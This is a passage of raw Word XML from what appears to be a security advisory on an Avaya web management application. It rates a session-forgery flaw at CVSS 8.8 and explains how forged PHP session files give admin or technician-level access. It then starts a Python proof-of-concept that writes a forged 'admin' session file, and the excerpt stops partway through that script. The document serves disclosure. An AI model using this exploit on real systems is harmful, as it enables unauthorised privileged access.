    <w:p w14:paraId="170CB124" w14:textId="3687E62A" w:rsidR="005B7151" w:rsidRPr="00FB7FA0" w:rsidRDefault="005B7151" w:rsidP="005B7151">
      <w:r w:rsidRPr="00FB7FA0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>CVSS 3.1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.8 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB7FA0">
        <w:t>AV:L</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB7FA0">
        <w:t>/AC:L/PR:L/UI:</w:t>
      </w:r>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7FA0">
        <w:t>/S:C/C:H/I:H/A:H</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0C8BB5" w14:textId="44E2E887" w:rsidR="00B53343" w:rsidRPr="005B7151" w:rsidRDefault="005B7151" w:rsidP="00B53343">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7FA0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B53343">
        <w:t>This vulnerability builds upon the problem described in Issue “</w:t>
      </w:r>
      <w:r w:rsidR="00B53343">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B53343">
        <w:instrText xml:space="preserve"> REF _Ref58922239 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00B53343">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>5) Session Hijack Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00B53343">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B53343">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14464743" w14:textId="3202331F" w:rsidR="00367285" w:rsidRDefault="005B7151" w:rsidP="00272B68">
      <w:r>
        <w:t>Due</w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve"> to missing </w:t>
      </w:r>
      <w:r w:rsidR="0000578A">
        <w:t>integrity checking logic</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve"> it is</w:t>
      </w:r>
      <w:r w:rsidR="00272B68">
        <w:t xml:space="preserve"> not only</w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve"> possible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for an attacker</w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="00272B68">
        <w:t xml:space="preserve"> hijack an existing session</w:t>
      </w:r>
      <w:r w:rsidR="00B53343">
        <w:t xml:space="preserve"> (as previously described)</w:t>
      </w:r>
      <w:r w:rsidR="00272B68">
        <w:t>, but it is also possible to</w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve"> alter an unauthenticated session file</w:t>
      </w:r>
      <w:r w:rsidR="003530FD">
        <w:t>’s contents</w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve"> as the </w:t>
      </w:r>
      <w:r w:rsidR="00272B68">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve">pache user to contain the data </w:t>
      </w:r>
      <w:r w:rsidR="003530FD">
        <w:t>for a</w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve"> valid session for any </w:t>
      </w:r>
      <w:r w:rsidR="003530FD">
        <w:t>valid user</w:t>
      </w:r>
      <w:r w:rsidR="00367285">
        <w:t xml:space="preserve">. By then calling the post-authentication landing page, this forged session will automatically be transformed into a fully valid session with the privileges of the user that were described in the forged session. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">It is not possible to use this technique to directly achieve root-level access as the root user is not allowed to authenticate to the web application, however an attacker can forge a </w:t>
      </w:r>
      <w:r w:rsidR="003D21DD">
        <w:t xml:space="preserve">session of any valid </w:t>
      </w:r>
      <w:r w:rsidR="00C679D8">
        <w:t xml:space="preserve">web application </w:t>
      </w:r>
      <w:r w:rsidR="003D21DD">
        <w:t>user including “admin” (which is the highest level of access for a customer) or even Avaya Technician-only accounts like “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D21DD">
        <w:t>csadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D21DD">
        <w:t>”, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D21DD">
        <w:t>inads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D21DD">
        <w:t>”, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D21DD">
        <w:t>rasaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D21DD">
        <w:t xml:space="preserve">”, and “craft”. </w:t>
      </w:r>
      <w:r w:rsidR="00367285">
        <w:t>Below is a simple Python</w:t>
      </w:r>
      <w:r w:rsidR="00494C37">
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
      <w:r w:rsidR="00367285">
        <w:t xml:space="preserve"> that use</w:t>
      </w:r>
      <w:r w:rsidR="00272B68">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00367285">
        <w:t xml:space="preserve"> CGI calls to create a fully authenticated “admin” user session):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B53343" w14:paraId="115151AC" w14:textId="77777777" w:rsidTr="00B53343">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="25B5DF9A" w14:textId="556BFBB3" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>#!/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>usr/bin/python</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="230CA0A5" w14:textId="3A1A8039" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="367BA41F" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import subprocess</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40540C5C" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="736AE9C1" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import random</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67968420" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1457B8F0" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="045E8597" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import grp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3937A063" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2610C817" w14:textId="04447285" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CGI_BIN = </w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>/opt/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>smi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi_main</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CD8D0D3" w14:textId="51E33AB4" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SESSION_PATH = </w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>/var/lib/php/session</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54D030E0" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>IP = "127.0.0.1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51EFF5E3" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>USER = "admin"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DB8F09C" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3AF38722" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_session_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, user):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B9403F0" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">  template = """logPageName|s:12:"legal notice";loginMethod|i:1;userName|s:5:"admin";expireTime|i:%d;authenticated|s:3:"yes";pam_session0|s:0:"";userId|i:%d;userGroup|s:%d:"%s";groupId|i:%d;ProfileId|s:2:"18";MENU_ID_loginUtils|s:3:"1.0";MENU_ID_topNavMenu|s:3:"3.0";MENU_ID_ESD_LeftNavigationMenu|s:3:"2.0";MENU_ID_UtilLeftNavigationMenu|s:3:"3.0";client_ip|s:%d:"%s";creationTime|i:%d;"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6867C6D5" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7043BF81" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  # Get user UID, GID, and Group Name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7216A7CE" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  u = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>pwd.getpwnam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(user)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A30720F" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>group_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>grp.getgrgid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>u.pw_gid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>).</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gr_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5F949CC3" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="634ED395" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  # Generate session token that doesn't collide with existing ones and looks same as real session token (not technically necessary)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6217E6CD" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  alphanumeric = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>string.ascii</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_lowercase</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>string.digits</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="49FE20FC" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35444D92" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1860B4B4" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    session = "</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(alphanumeric[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>random.randint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">(0, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(alphanumeric) - 1)] for _ in range(26))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51012EFD" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35747255" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>if(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">not </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>os.path.exists</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>os.path.join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(SESSION_PATH, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sess</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>_" + session))):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F52F939" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D2FF173" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="734E9846" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = int(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>time.time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2934AAEB" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>expireTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + 100000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648DCC04" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2ED89CB5" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>session_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = template % (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>expireTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>u.pw_uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>group_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>group_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>u.pw_gid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47008AC5" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7AD87830" w14:textId="2D5AE2CE" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>open(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>os.path.join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(SESSION_PATH, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sess</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">_" + session), </w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>) as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D87B45C" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>session_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A1F0F0E" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54915990" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  return session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6725BC1B" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DAE4CFF" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>get_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>request</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">path, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12CCAFC7" w14:textId="030556CF" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
